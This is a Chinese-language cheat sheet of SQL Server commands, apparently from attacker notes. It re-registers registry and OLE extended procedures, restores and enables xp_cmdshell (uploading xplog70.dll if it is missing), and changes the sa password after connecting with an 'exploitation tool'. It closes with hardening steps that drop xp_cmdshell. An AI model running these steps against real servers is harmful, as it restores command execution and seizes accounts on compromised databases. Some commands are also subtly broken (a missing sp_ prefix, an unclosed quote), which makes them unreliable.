exec sp_addextendedproc sp_OADestroy,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAStop,'odsole70.dll' <br> | |
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regread,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regwrite,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
刪除擴展存儲過過程xp_cmdshell的語句: <br> | |
exec sp_dropextendedproc 'xp_cmdshell' <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
恢復cmdshell的sql語句 <br> | |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
開啓cmdshell的sql語句 <br> | |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
判斷存儲擴展是否存在 <br> | |
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' <br> | |
返回結果爲1就ok <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
恢復xp_cmdshell <br> | |
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' <br> | |
返回結果爲1就ok <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
否則上傳xplog7.0.dll <br> | |
exec master.dbo.addextendedproc 'xp_cmdshell','c:/winnt/system32/xplog70.dll' <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
堵上cmdshell的sql語句 <br> | |
sp_dropextendedproc "xp_cmdshell <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
一.更改sa口令方法:<br> | |
用sql綜合利用工具連接後,執行命令:<br> | |
exec sp_password NULL,'新密碼','sa'<br> | |
(提示:慎用!)<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
二.簡單修補sa弱口令.<br> | |
方法1:查詢分離器連接後執行:<br> | |
if exists (select * from <br> | |
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and <br> | |
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)<br> | |
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'<br> | |
GO<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
方法2:查詢分離器連接後<br> | |
第一步執行:use master <br> | |
第二步執行:sp_dropextendedproc 'xp_cmdshell' <br> | |
然後按F5鍵命令執行完畢<br> |